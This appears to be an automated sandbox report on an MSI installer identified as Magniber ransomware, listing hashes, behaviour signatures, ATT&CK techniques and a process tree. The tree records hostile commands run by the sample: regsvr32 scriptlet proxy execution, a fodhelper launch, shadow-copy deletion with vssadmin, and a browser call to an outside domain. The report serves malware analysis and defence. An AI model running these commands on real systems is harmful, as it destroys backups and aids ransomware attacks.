Analysis
-
max time kernel
150s -
max time network
155s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
-
submitted
29-07-2024 12:13
General
-
Target
41ef278a866d57e3c81882e4ad7f6d04ae6b066cfd5632120d9ac4332d66753e.msi
-
Size
96KB
-
MD5
42ad49ed99c0d41a820316309bc2c3b3
-
SHA1
f447a72b3cbea72e1b56fda8f44fd9f304b4474a
-
SHA256
41ef278a866d57e3c81882e4ad7f6d04ae6b066cfd5632120d9ac4332d66753e
-
SHA512
4e0af295dc656ad70361363c77646fb899a1ff4a816790959e090125bdba2089eb058dfa2b18bdcede34b45d9420b6f57c0db6aefa32f9799eccec3f163bdf75
-
SSDEEP
1536:kiqCWq/Gf2CJ7ZrhzZr98n+lW0D80D+7fxun:xqCWqu+q8nLLxun
Malware Config
Signatures
-
Detect magniber ransomware 1 IoCs
-
Magniber Ransomware
Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.
-
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Renames multiple (74) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
System Binary Proxy Execution: Regsvr32 1 TTPs 9 IoCs
Abuse Regsvr32 to proxy execution of malicious code.
-
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Suspicious use of SetThreadContext 3 IoCs
-
Drops file in Windows directory 9 IoCs
-
Loads dropped DLL 1 IoCs
-
Browser Information Discovery 1 TTPs
Enumerate browser information.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Installer Packages 2 TTPs 1 IoCs
-
Checks SCSI registry key(s) 3 TTPs 5 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Interacts with shadow copies 3 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
-
Modifies registry class 14 IoCs
-
Suspicious behavior: EnumeratesProcesses 14 IoCs
-
Suspicious behavior: MapViewOfSection 3 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 27 IoCs
-
Suspicious use of SendNotifyMessage 24 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Windows\system32\sihost.exesihost.exe1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\regsvr32.exeregsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/x5m0mhr74m72⤵
- System Binary Proxy Execution: Regsvr32
- Modifies registry class
-
-
C:\Windows\system32\cmd.execmd /c "start fodhelper.exe"2⤵
-
C:\Windows\system32\fodhelper.exefodhelper.exe3⤵
-
C:\Windows\system32\regsvr32.exe"regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/dsv3cwbg27yh4⤵
- System Binary Proxy Execution: Regsvr32
-
C:\Windows\System32\vssadmin.exe"C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet5⤵
- Interacts with shadow copies
-
-
-
-
-
C:\Windows\system32\cmd.execmd /c "start fodhelper.exe"2⤵
-
C:\Windows\system32\fodhelper.exefodhelper.exe3⤵
-
C:\Windows\system32\regsvr32.exe"regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/dsv3cwbg27yh4⤵
- System Binary Proxy Execution: Regsvr32
-
C:\Windows\System32\vssadmin.exe"C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet5⤵
- Interacts with shadow copies
-
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\regsvr32.exeregsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/x5m0mhr74m72⤵
- System Binary Proxy Execution: Regsvr32
- Modifies registry class
-
-
C:\Windows\system32\cmd.execmd /c "start fodhelper.exe"2⤵
-
C:\Windows\system32\fodhelper.exefodhelper.exe3⤵
-
C:\Windows\system32\regsvr32.exe"regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/dsv3cwbg27yh4⤵
- System Binary Proxy Execution: Regsvr32
-
C:\Windows\System32\vssadmin.exe"C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet5⤵
- Interacts with shadow copies
-
-
-
-
-
C:\Windows\system32\cmd.execmd /c "start fodhelper.exe"2⤵
-
C:\Windows\system32\fodhelper.exefodhelper.exe3⤵
-
C:\Windows\system32\regsvr32.exe"regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/dsv3cwbg27yh4⤵
- System Binary Proxy Execution: Regsvr32
-
C:\Windows\System32\vssadmin.exe"C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet5⤵
- Interacts with shadow copies
-
-
-
-
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\regsvr32.exeregsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/x5m0mhr74m72⤵
- System Binary Proxy Execution: Regsvr32
- Modifies registry class
-
-
C:\Windows\system32\cmd.execmd /c "start fodhelper.exe"2⤵
-
C:\Windows\system32\fodhelper.exefodhelper.exe3⤵
-
C:\Windows\system32\regsvr32.exe"regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/dsv3cwbg27yh4⤵
- System Binary Proxy Execution: Regsvr32
-
C:\Windows\System32\vssadmin.exe"C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet5⤵
- Interacts with shadow copies
-
-
-
-
-
C:\Windows\system32\cmd.execmd /c "start fodhelper.exe"2⤵
-
C:\Windows\system32\fodhelper.exefodhelper.exe3⤵
-
C:\Windows\system32\regsvr32.exe"regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/dsv3cwbg27yh4⤵
- System Binary Proxy Execution: Regsvr32
-
C:\Windows\System32\vssadmin.exe"C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet5⤵
- Interacts with shadow copies
-
-
-
-
-
C:\Windows\system32\msiexec.exemsiexec.exe /I C:\Users\Admin\AppData\Local\Temp\41ef278a866d57e3c81882e4ad7f6d04ae6b066cfd5632120d9ac4332d66753e.msi1⤵
- Enumerates connected drives
- Event Triggered Execution: Installer Packages
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\srtasks.exeC:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:22⤵
-
-
C:\Windows\System32\MsiExec.exeC:\Windows\System32\MsiExec.exe -Embedding 52395E5A6EE9602D0D5532B186A8277F2⤵
- Suspicious use of SetThreadContext
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.execmd /c "start microsoft-edge:http://24182a38e8d00650a464tbodbmuw.ofrisk.info/tbodbmuw^&2^&55707532^&74^&397^&22190413⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument microsoft-edge:http://24182a38e8d00650a464tbodbmuw.ofrisk.info/tbodbmuw&2&55707532&74&397&22190414⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffc438d46f8,0x7ffc438d4708,0x7ffc438d47185⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1988,7212975037502959902,7149977769416242299,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2020 /prefetch:25⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1988,7212975037502959902,7149977769416242299,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2316 /prefetch:35⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1988,7212975037502959902,7149977769416242299,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2852 /prefetch:85⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,7212975037502959902,7149977769416242299,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:15⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,7212975037502959902,7149977769416242299,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:15⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,7212975037502959902,7149977769416242299,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4620 /prefetch:15⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,7212975037502959902,7149977769416242299,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3560 /prefetch:15⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1988,7212975037502959902,7149977769416242299,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4256 /prefetch:85⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1988,7212975037502959902,7149977769416242299,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4256 /prefetch:85⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,7212975037502959902,7149977769416242299,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4700 /prefetch:15⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,7212975037502959902,7149977769416242299,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4792 /prefetch:15⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,7212975037502959902,7149977769416242299,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4712 /prefetch:15⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,7212975037502959902,7149977769416242299,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3640 /prefetch:15⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,7212975037502959902,7149977769416242299,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4052 /prefetch:15⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,7212975037502959902,7149977769416242299,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4732 /prefetch:15⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1988,7212975037502959902,7149977769416242299,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4244 /prefetch:25⤵
- Suspicious behavior: EnumeratesProcesses
-
-
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
Direct Volume Access
1Indicator Removal
2File Deletion
2System Binary Proxy Execution
2Msiexec
1Regsvr32
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
7KB
MD5c3062ff5fed9a143ac36de6ed432972d
SHA1808c051f0bce6eeff568a66e9c1ca383941c320e
SHA2563d342d8a35abc212d9ec59c8ccd35f2db581100549b1b63a3157843d1e1e3b4c
SHA512d9578c29d590ce2af270b98c58d219b40835e223c996bea9cf105d637cad775c190a238a96e12ce5b050729c9b47e0d1e65bd29d4c023763d673d4e2e9825bdc
-
Filesize
152B
MD560ead4145eb78b972baf6c6270ae6d72
SHA1e71f4507bea5b518d9ee9fb2d523c5a11adea842
SHA256b9e99e7387a915275e8fe4ac0b0c0cd330b4632814d5c9c446beb2755f1309a7
SHA5128cdbafd2783048f5f54f22e13f6ef890936d5b986b0bb3fa86d2420a5bfecf7bedc56f46e6d5f126eae79f492315843c134c441084b912296e269f384a73ccde
-
Filesize
152B
MD51f9d180c0bcf71b48e7bc8302f85c28f
SHA1ade94a8e51c446383dc0a45edf5aad5fa20edf3c
SHA256a17d56c41d524453a78e3f06e0d0b0081e79d090a4b75d0b693ddbc39f6f7fdc
SHA512282863df0e51288049587886ed37ad1cf5b6bfeed86454ea3b9f2bb7f0a1c591f3540c62712ebfcd6f1095e1977446dd5b13b904bb52b6d5c910a1efc208c785
-
Filesize
6KB
MD5079ab53cc1ffe030ebc88ac23f93878e
SHA1f9f893ef6f344b74e7a052e296e51173a79faced
SHA256bb92969d47c91e90f5862f70f747b559c4da6294eb5949795f2a3c81a0ddbbe4
SHA512c63d4e251397fd1cccde947c7039ccbb6fb2902ac209a3b5f2549f6d6879859920622da439395863d5aaa17f5372f7eff06de93a6adfa8eb5ce8bef5f77f5d7b
-
Filesize
5KB
MD5941dbfa249e904572c3dc5b0e510f8bc
SHA101680c64f41868bbb87f5dcb84acfe473fa55d24
SHA25673b91fb115fd4397dbd8e3d28c1b5bbec53f1ffe3f1bebaf1409a8f2a74f40fd
SHA5120de2a791025cd7fdd5dca947ec16f78d6863952e846af21970e10fcaa94c7039f822dcb048db963711c45664c9e6f8390f66e63bd7b00791f04d329e5a67ec74
-
Filesize
16B
MD56752a1d65b201c13b62ea44016eb221f
SHA158ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA2560861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA5129cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389
-
Filesize
11KB
MD5f1a2d8f95a12a2c4e0522e40838eb136
SHA175fdc57ce0b3b475aaf21d96a8061d4d3488b783
SHA2564625bba1c5f1aec0e1258913b9f0a0e2d9d57d61cc651c2ac8fcc72c3c49b581
SHA512fff9c7a0d63403f69f88c1ef0d7270a16d335bdfa3bca50c495ca99f5d59a96a1c8067ffeace09b3cc7da4264cf3dcb68eafea8bcbf1932bdc0e72d5dfcb47a1
-
Filesize
17KB
MD5c9db94b10009e7ca30414af7467e38dd
SHA1bf7454e1df4adea865b759a981d31b07be41ea3f
SHA2563e103fb9f79a14a549242f2e2d2a58884d710766b06dd67c83f99f4df6bd0923
SHA512bcd7c612c476a5e0dad1ffc3a7520dd2c1a1f3278405b04165ce256830088140461e33858e9c40cc99dd6b62670e09ac1e8844eef232d752ce3ae2ae010215fc
-
Filesize
1KB
MD5947919690674ae37064deafb3fa326db
SHA1b79f7f3ad22c9e84546750502f517d16a7618366
SHA256fa4d045e690fbaa4f22fc3827f168e59791e1677ee6c5888a37aa8caf964d801
SHA512c7fcc911acc3084985f07add40a0a41d6628ca567016551196744444e39a562444385647ea5741357bf8bc49695e9cd83cb9d6c45be6f71ef31263b52ba0e32b
-
Filesize
4KB
MD5a756835ce38c068139d8fad26cb47fed
SHA1c1bb3d145188606d07e7b29d86ea6a08586e268d
SHA256d5cfccfe2e3f5ecb566543c74f2972176f61a857234fd33a48325e9459742a78
SHA512d18aa222daf8c3e51e5bf58d2c6ff531b0db92a03f8546efa8add0ac77de4649b1cc73811ad991cc75eb2a9eb22b07ca5d0924569440aba99ce0416527547fac
-
Filesize
56KB
MD591de8a79098ac3d20726e1acb50cd05d
SHA19cb04003c75f0cb63fe0c6dcd22a0c64d63154be
SHA25654f8d71fb3117854743d594aa28427b943e5b2fb46f6003dbf4a9b562ebbfcea
SHA51270cf1fe2c4d9b68c12b30df9013c4a1fd5b5a9fef1de704a42535259d1196b35eca6191270b19dedc4d3699b8211868b6b31a5ae3cccdc24711fb335fc32edc3
-
Filesize
96KB
MD542ad49ed99c0d41a820316309bc2c3b3
SHA1f447a72b3cbea72e1b56fda8f44fd9f304b4474a
SHA25641ef278a866d57e3c81882e4ad7f6d04ae6b066cfd5632120d9ac4332d66753e
SHA5124e0af295dc656ad70361363c77646fb899a1ff4a816790959e090125bdba2089eb058dfa2b18bdcede34b45d9420b6f57c0db6aefa32f9799eccec3f163bdf75
-
Filesize
12KB